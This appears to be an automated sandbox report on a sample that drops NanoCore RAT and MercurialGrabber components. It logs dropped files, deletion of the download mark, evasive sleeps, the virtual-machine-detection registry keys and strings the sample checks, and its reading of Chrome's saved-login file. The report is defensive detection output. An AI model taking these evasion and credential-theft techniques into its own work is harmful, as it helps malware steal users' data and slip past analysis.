Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File created: C:\ProgramData\nano.exe
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File created: C:\ProgramData\output.exe
Drops PE files
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File created: C:\ProgramData\nano.exe
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File created: C:\ProgramData\output.exe
Source: C:\ProgramData\nano.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\ProgramData\nano.exe File opened: C:\ProgramData\nano.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\nano.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\output.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe TID: 6916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\nano.exe TID: 5884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\nano.exe TID: 6292 Thread sleep time: -120000s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -100000s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99843s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99733s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99624s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99515s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99406s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99279s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99168s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99060s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98952s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98843s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98734s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98623s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98515s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -98406s >= -30000s
Source: C:\ProgramData\output.exe TID: 6224 Thread sleep time: -99937s >= -30000s
Source: C:\ProgramData\output.exe TID: 5512 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\output.exe TID: 2880 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\nano.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\output.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\output.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\nano.exe Window / User API: threadDelayed 890
Source: C:\ProgramData\nano.exe Window / User API: foregroundWindowGot 1016
Source: C:\ProgramData\nano.exe Window / User API: foregroundWindowGot 383
Source: C:\ProgramData\output.exe Window / User API: threadDelayed 976
Source: C:\ProgramData\output.exe Window / User API: threadDelayed 2661
Contains capabilities to detect virtual machines
Source: C:\ProgramData\output.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosInformation
Source: C:\ProgramData\output.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\ProgramData\output.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\ProgramData\nano.exe Process information queried: ProcessInformation
Source: C:\ProgramData\nano.exe Code function: 2_2_054D12DA GetSystemInfo, 2_2_054D12DA
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\nano.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\output.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\output.exe Thread delayed: delay time: 100000
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99843
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99733
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99624
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99515
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99406
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99279
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99168
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99060
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98952
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98843
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98734
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98623
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98515
Source: C:\ProgramData\output.exe Thread delayed: delay time: 98406
Source: C:\ProgramData\output.exe Thread delayed: delay time: 99937
Source: C:\ProgramData\output.exe Thread delayed: delay time: 922337203685477
Source: output.exe.0.dr Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: output.exe.0.dr Binary or memory string: vmware
Source: 4Y85lSOUJ0.exe, output.exe.0.dr Binary or memory string: virtualboxvboxqemu
Source: output.exe Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: output.exe Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^#C
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: output.exe.0.dr Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
Source: output.exe, 00000005.00000002.301549791.00000000009A0000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS

Anti Debugging:

Enables debug privileges
Source: C:\ProgramData\nano.exe Process token adjusted: Debug
Source: C:\ProgramData\output.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"
Source: nano.exe, 00000002.00000002.552908452.000000000332B000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp Binary or memory string: Progman
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\ProgramData\output.exe Queries volume information: C:\ProgramData\output.exe VolumeInformation
Queries the product ID of Windows
Source: C:\ProgramData\output.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\ProgramData\nano.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\ProgramData\nano.exe Code function: 2_2_011DAF9A GetUserNameW, 2_2_011DAF9A

Stealing of Sensitive Information:

Yara detected MercurialGrabber
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\output.exe, type: DROPPED
Yara detected Nanocore RAT
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\ProgramData\output.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data

Remote Access Functionality:

Yara detected MercurialGrabber
Source: Yara match File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\output.exe, type: DROPPED
Detected Nanocore Rat
Source: 4Y85lSOUJ0.exe String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAs